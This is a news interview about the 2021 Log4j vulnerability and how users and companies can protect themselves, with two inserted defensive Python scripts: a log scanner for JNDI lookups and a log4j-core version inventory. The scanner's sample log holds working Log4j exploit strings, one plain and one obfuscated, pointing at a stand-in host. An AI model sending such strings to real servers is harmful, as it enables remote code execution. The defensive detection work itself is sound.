IT expert warns: Huge wave of hacker attacks threatens this Christmas - "the criminals will take advantage of"

2021-12-23T04:25:29.738Z


Created: 12/23/2021, 05:08 AM

From: Matthias Schneider

The vulnerability in the log4j file could provoke a huge wave of hacker attacks over Christmas.

Private users and companies can now protect themselves.

Munich - A security gap threatens millions of users.

Niklas Keller, head of IT security for Germany, Austria and Switzerland at the IT system provider Bechtle, explains to IPPEN.MEDIA how users can protect themselves from the effects of the so-called Log4j gap.

Niklas Keller, Bechtle Cyber Security Head for Germany, Austria and Switzerland © Bechtle AG

The Log4j vulnerability caused a stir around the world.

In the meantime it has calmed down.

Has the subject been dealt with?

On the contrary, we assume that hackers are currently setting up sleeper programs to really get going on the holidays.

The computer programs of every second to third manufacturer are likely to be affected by this.

For example, the Belgian Ministry of Defense had to shut down parts of its network.

Basically, companies in particular are the target of strategic attacks.

However, private users can also be affected.

The Federal Office for Information Security has rightly declared the “red alert”.

This was last the case with the Microsoft Exchange gap in the spring.

How could it possibly come this far?

Log4j is an open source file with a logging function that is very widely used.

Due to its construction, however, it is unintentionally susceptible to so-called remote code execution.

This means that you send a certain string of characters to an application or website that uses the Log4j file.

Instead of posting this string as a normal log entry, it is executed as code.

This opens a door for hackers to break into the program.

The security gap has existed unnoticed since 2013.
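The "certain string of characters" the interview refers to is, in practice, a Log4j lookup of the form `${jndi:...}`, and the first question a defender asks is whether such strings have already reached their own servers. The scanner below is an added example, not part of the interview and not Bechtle's tooling. It runs over constructed sample access-log lines (documentation IP ranges, hostnames under the reserved `.invalid` domain) and reports every JNDI lookup it finds, after undoing the URL encoding and collapsing the nested lookups that keep the literal text "jndi" out of a naive text search.

```python
"""Scan access-log lines for Log4j JNDI lookup strings.

Added example, not part of the interview. SAMPLE_LOG is constructed,
not real traffic.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Probes frequently wrap parts of the lookup in nested lookups that Log4j
# resolves before the JNDI lookup runs, so a search for the plain text
# "${jndi:" misses them. Collapsing the common forms first restores it:
#   ${lower:J} -> j     ${upper:n} -> N     ${::-j} / ${env:X:-j} -> j
_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup itself: scheme (ldap, ldaps, rmi, dns, ...) and its target.
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^}\s]*)", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode, then collapse nested lookups until nothing changes."""
    text = unquote(text)
    for _ in range(10):  # bounded so hostile input cannot spin forever
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


@dataclass
class Finding:
    line_no: int
    scheme: str   # protocol the lookup would use to fetch the payload
    target: str   # host:port/path the victim would have connected to
    raw: str      # original log line, for the incident record


def scan(lines):
    """Return one Finding per JNDI lookup found in the given log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(line)):
            findings.append(Finding(n, m.group(1).lower(), m.group(2), line.rstrip()))
    return findings


# Constructed sample: line 2 carries a plain probe in the User-Agent field,
# line 3 the same idea URL-encoded and obfuscated inside a query parameter.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Dec/2021:23:58:01 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Dec/2021:23:58:04 +0100] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://scanner.example.invalid:1389/a}"',
    '198.51.100.9 - - [22/Dec/2021:23:58:05 +0100] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi'
    '%3A%2F%2Fscanner.example.invalid%3A1099%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.5 - - [22/Dec/2021:23:58:09 +0100] "GET /docs HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} lookup -> {f.target}")
        print(f"    {f.raw}")
```

A hit shows that a probe reached the application; whether it did anything depends on the Log4j version in use and on whether the host could make the outbound connection to the target, so a hit is a reason to check both, not proof of compromise. Running the scan over Internet-facing systems first follows the risk ranking given later in the interview.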

How can this loophole be exploited?

Systems that can be reached via the Internet are primarily at risk.

However, systems behind a firewall that use the Log4j library can also be vulnerable if the attacker is already in the network.

Hackers use automated programs to search for systems that have this vulnerability.

Sending the specific character string to the affected system exploits the vulnerability and installs unwanted malware.

What can happen?

So far we have mainly identified attacks from cryptominers.

They tap into the computing power of systems to calculate crypto currencies such as Bitcoin.

Preparing for further attacks is far more dangerous.

Many criminals are currently using the vulnerability to place sleeper programs, such as so-called bots, in the attacked systems.

What can these programs do?

For example, they can steal information or hijack the system for a DDoS attack.

For this purpose, thousands of computers are taken over, which are constantly trying to access an online service, for example a website.

This is then blocked due to overload.

What else can happen?

Targeted hacker attacks on the system itself are more dangerous.

On the one hand, these can be ransomware attacks.

The systems of those affected are encrypted and only made usable again for a ransom.

At the same time, the stolen data is usually threatened to be published on the Darknet.

Another scenario is the spread of so-called cobalt strike beacons.

Hackers can control the entire system remotely.

We have already observed the first attacks in this work in connection with the log4j vulnerability.

How can you protect yourself?

Unfortunately, a virus scanner is of no use here.

However, the manufacturers are working flat out to close the gaps.

However, this is only useful to users if they immediately install the available software updates.

In addition, attention should be paid to whether there are unusual activities.

Commercial users now also have to check where the security gaps exist in their software architecture, how they can be closed and whether the attackers are already in the system.

That is also the job of an IT service provider: identifying weak points, correcting them and - in the worst case - fending off attacks and forensically examining how far the attackers have come.

To this end, we have been actively approaching our customers since the vulnerability became known.

However, if there is a security hole that cannot be closed immediately, you have to consider taking the system offline because the risk of an attack is currently very high.

But right now, many IT experts are also going on Christmas vacation.

And that is what the criminals will take advantage of.

The attacks are started preferentially when nobody is in the company to discover their actions.

We expect that many attackers are currently waiting for the first smoke to clear in order to strike.

For companies that do not fix the gaps in good time, this can lead to high financial losses and, in case of doubt, also to an existential threat.
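The check the interview asks of commercial users, finding where in the software architecture the gap exists, starts with an inventory: which deployed archives carry the vulnerable library, and which version. The script below is an added example, not part of the interview and not Bechtle's tooling. It walks a directory tree, opens every JAR/WAR/EAR (descending into archives nested inside other archives, which is where application servers and fat JARs hide their copies) and reads the log4j-core version from the Maven `pom.properties` file that log4j-core JARs ship. The fixed-version threshold is a parameter; the value used here is the one published by the Apache Log4j project at the article's date and should be re-checked against the project's current security advisory before use. The sample deployment it builds is constructed test data.

```python
"""Inventory log4j-core versions in JAR/WAR/EAR files, nested ones included.

Added example, not part of the interview. build_sample_tree() creates
constructed test data so the scanner can run offline.
"""
import io
import os
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Assumption: fixed version per the Apache advisory at the article's date;
# verify against the project's current security page before relying on it.
FIXED_VERSION = (2, 17, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); non-numeric tails such as '-beta9' count as 0."""
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3])


def classify(version):
    if version == "unknown":
        return "unknown version; inspect manually"
    v = parse_version(version)
    if v[0] < 2:
        return "log4j 1.x is end of life; review separately"
    if v < FIXED_VERSION:
        return "VULNERABLE (below %d.%d.%d)" % FIXED_VERSION
    return "ok"


def _walk_archive(zf, path, results):
    """Record any log4j-core in this archive, descending into nested archives."""
    for name in zf.namelist():
        if name == POM_PROPS:
            props = zf.read(name).decode("utf-8", "replace")
            version = next((line.split("=", 1)[1].strip()
                            for line in props.splitlines()
                            if line.startswith("version=")), "unknown")
            results.append((path, version, classify(version)))
        elif name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue  # suffix lied; not an archive
            _walk_archive(inner, f"{path}!/{name}", results)


def scan_path(root):
    """Walk a directory tree; return (archive path, version, status) triples."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            full = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(full) as zf:
                    _walk_archive(zf, full, results)
            except zipfile.BadZipFile:
                continue
    return results


def _core_jar(version):
    """Constructed stand-in for a log4j-core JAR: only the metadata file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed deployment: an old log4j-core, an unrelated JAR, and a WAR
    bundling a fixed log4j-core under WEB-INF/lib."""
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_core_jar("2.14.1"))
    with zipfile.ZipFile(os.path.join(lib, "other.jar"), "w") as zf:
        zf.writestr("com/example/Other.class", b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(os.path.join(root, "app", "service.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.17.0.jar", _core_jar("2.17.0"))


def demo():
    """Build the sample tree in a temp dir; return the inventory with relative paths."""
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    return sorted((os.path.relpath(p, root), v, s) for p, v, s in scan_path(root))


if __name__ == "__main__":
    for path, version, status in demo():
        print(f"{status:40} {version:8} {path}")
```

Point `scan_path()` at an application's install directory rather than the constructed tree to get a real inventory. The file-based check only answers the first of the interview's three questions; whether the gap can be closed by an update and whether attackers are already inside still need the vendor's patch status and a look at the logs.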

How can you protect yourself in the long term?

You can't just buy a technology and sit back.

Hundreds of vulnerabilities are discovered every week.

That's why you always need a contingency plan: How do I find out which gaps affect me?

Who is there immediately if there is an attack?

What will it cost me to take my system offline?

How do I restore it quickly?

Both self-employed people and large companies need such an emergency plan.

Source: merkur
